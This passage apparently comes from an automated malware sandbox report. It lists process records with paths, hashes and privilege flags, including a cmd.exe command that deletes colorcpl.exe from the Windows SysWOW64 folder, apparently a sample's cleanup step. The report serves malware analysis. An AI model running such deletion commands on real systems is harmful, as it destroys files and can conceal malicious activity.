Path: C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit): true
Commandline: /c del "C:\Windows\SysWOW64\colorcpl.exe"
Imagebase: 0x11d0000
File size: 232960 bytes
MD5 hash: F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID: 11
Start time: 18:25:38
Start date: 29/11/2022
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fcd70000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

No disassembly